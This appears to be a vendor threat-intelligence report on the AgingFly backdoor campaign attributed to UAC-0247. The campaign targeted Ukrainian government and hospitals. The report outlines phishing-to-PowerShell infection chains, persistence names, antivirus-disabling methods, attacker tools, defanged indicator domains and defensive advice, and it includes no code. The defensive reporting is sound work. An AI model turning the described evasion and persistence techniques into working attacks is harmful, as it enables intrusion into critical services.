AgingFly Malware: UAC-0247 Cyberattacks Target Ukrainian Government and Hospitals with Digitally Signed Malware

A new and highly sophisticated malware strain, AgingFly, has been identified as the primary tool in a wave of cyberattacks targeting Ukrainian government agencies and hospitals. These attacks, attributed to the threat cluster UAC-0247, leverage advanced social engineering, multi-stage payload delivery, and custom malware to achieve persistent access, data exfiltration, and operational disruption. The campaign, active since at least March 2026, demonstrates a high degree of technical innovation, including the abuse of digitally signed software, advanced evasion techniques, and the integration of both espionage and financial gain objectives. The scope and impact of these attacks underscore the urgent need for robust detection, response, and mitigation strategies across all sectors, especially those involved in critical infrastructure and healthcare.

The threat actor behind the AgingFly campaign is tracked as UAC-0247 by CERT-UA. This cluster exhibits tactics, techniques, and procedures (TTPs) that overlap with known Russian advanced persistent threat (APT) groups, although no direct attribution to a specific APT (such as APT28) has been publicly confirmed. UAC-0247 is characterized by its focus on Ukrainian targets, particularly those in government, healthcare, and defense sectors. The group demonstrates a high level of operational security, adaptability, and technical sophistication, employing custom malware, living-off-the-land binaries (LOLBins), and digitally signed payloads to evade detection and maintain persistence. The motivation appears to be a blend of espionage, disruption of critical services, and secondary financial gain through cryptomining.

The AgingFly malware is a custom-developed C# backdoor designed for modularity and stealth. Its infection chain typically begins with phishing emails crafted around humanitarian or wartime themes, exploiting the heightened sense of urgency and trust during conflict. These emails contain links to archives hosting malicious LNK shortcut files. Upon execution, these files leverage native Windows tools such as mshta.exe and PowerShell to download and execute further payloads, often presenting decoy documents to the user to mask malicious activity.

The malware employs a multi-stage loader architecture. Initial payloads are heavily obfuscated and compressed, with subsequent stages decrypted and executed in memory. Persistence is achieved through the creation of scheduled tasks (e.g., "WMILoad", "ClockRemoval") and WMI event subscriptions ("MbRemoval", "MbSetup"), as well as code injection into legitimate processes like RuntimeBroker.exe. The campaign also utilizes a PowerShell-based persistence tool, SILENTLOOP, which dynamically retrieves command-and-control (C2) addresses, sometimes sourcing them from Telegram channels to enhance resilience.

AgingFly's core capabilities include remote command execution, file exfiltration, screenshot capture, keylogging, and the dynamic retrieval and compilation of additional command logic from remote servers. This adaptability allows the malware to evolve its functionality post-infection, complicating detection and analysis. The campaign further employs credential theft tools such as CHROMELEVATOR (for browser credentials) and ZAPIXDESK (for WhatsApp data), as well as reconnaissance utilities like RUSTSCAN. Lateral movement is facilitated by tunneling tools including LIGOLO-NG and CHISEL.

A notable innovation in this campaign is the abuse of digitally signed software from Dragon Boss Solutions LLC. Malicious installers for products such as Chromstera Browser, Chromnius, WorldWideWeb, Web Genius, and Artificius Browser are used to deploy payloads with SYSTEM privileges, disable antivirus protections, and establish persistence. Additionally, a trojanized WireGuard VPN installer embeds the XMRIG cryptominer, indicating a secondary objective of resource hijacking for financial gain.

Antivirus evasion is achieved through PowerShell scripts that disable security products (including Malwarebytes, Kaspersky, McAfee, and ESET), modify the hosts file to block AV vendor domains, and set Microsoft Defender exclusions for suspicious directories ("DGoogle", "EMicrosoft", "DDapps"). The campaign also leverages reverse shells such as RAVENSHELL for encrypted C2 communication.

The AgingFly campaign has resulted in over 23,500 confirmed infections across 124 countries, with a concentration in Ukrainian government, healthcare, utilities, and educational networks. Notable incidents include successful compromises of hospital IT systems, local government agencies, and defense sector personnel, including the distribution of trojanized FPV drone operator software via Signal messenger. The attackers have demonstrated the ability to deploy payloads with SYSTEM privileges, disable endpoint protection, and maintain long-term access for both espionage and disruptive operations.

CERT-UA has documented multiple cases where digitally signed software was abused to bypass security controls, and where PowerShell scripts were used to systematically neutralize antivirus defenses. The use of legitimate digital signatures and living-off-the-land techniques has significantly hindered detection by traditional security solutions.

The primary targets of the AgingFly campaign are Ukrainian clinical hospitals, emergency services, municipal bodies, and defense sector entities. The attackers have also targeted military personnel, particularly those involved in drone operations, by distributing trojanized control software. While Ukraine remains the focal point, the campaign's infrastructure and payloads have been detected in networks spanning 124 countries, indicating a broad and opportunistic approach to victim selection.

The targeting strategy leverages social engineering themes relevant to the ongoing conflict, such as humanitarian aid and emergency response, to increase the likelihood of successful phishing. The use of digitally signed software and legitimate communication channels (e.g., Signal, Telegram) further enhances the credibility of malicious payloads and complicates attribution.

Organizations are strongly advised to implement a multi-layered defense strategy to counter the AgingFly threat. Key recommendations include restricting the execution of LNK, HTA, and JavaScript files from email and untrusted sources, and limiting the use of native Windows tools such as mshta.exe and PowerShell through application whitelisting and endpoint protection policies. Continuous monitoring for the creation of suspicious scheduled tasks, WMI event subscriptions, and unauthorized PowerShell script execution is essential.

Security teams should audit endpoints for processes signed by Dragon Boss Solutions LLC, review hosts file entries for unauthorized AV domain blocks, and investigate any Microsoft Defender exclusions set for non-standard directories. It is critical to remove any suspicious exclusions and restore AV functionality immediately upon detection.

Network monitoring should focus on detecting anomalous outbound connections to known malicious domains such as chromsterabrowser[.]com and worldwidewebframework3[.]com, as well as encrypted C2 traffic patterns associated with RAVENSHELL and similar tools. Incident response plans should be updated to include procedures for identifying and remediating infections involving digitally signed malware and living-off-the-land techniques.

User awareness training should emphasize the risks associated with phishing emails, especially those themed around current events or humanitarian efforts. Regular security assessments and threat hunting activities are recommended to proactively identify and mitigate emerging threats.

The following sources provide additional technical details and context for the AgingFly campaign:

The Cyber Express: Ukraine Warns of Surge in Cyberattacks on Hospitals, Local Governments by UAC-0247 Hackers (https://thecyberexpress.com/cyberattacks-on-hospitals-by-uac-0247-hackers/)

BleepingComputer: Signed software abused to deploy antivirus-killing scripts (https://www.bleepingcomputer.com/news/security/signed-software-abused-to-deploy-antivirus-killing-scripts/)

ScamLens: Signed software abused to deploy antivirus-killing scripts (https://scamlens.org/en/intelligence/news/0055b4d3-1c2b-4e64-9401-629461527b7c/signed-software-abused-to-deploy-antivirus-killing-scripts)

CERT-UA Advisory (UAC-0247) (https://cert.gov.ua/article/441)

MITRE ATT&CK Framework (https://attack.mitre.org/)

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their supply chain and digital ecosystem. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify vulnerabilities, respond to emerging threats, and ensure compliance with industry standards. For more information about how Rescana can help strengthen your organization's cyber resilience, please contact us at ops@rescana.com.

• Cybersecurity Incident Analysis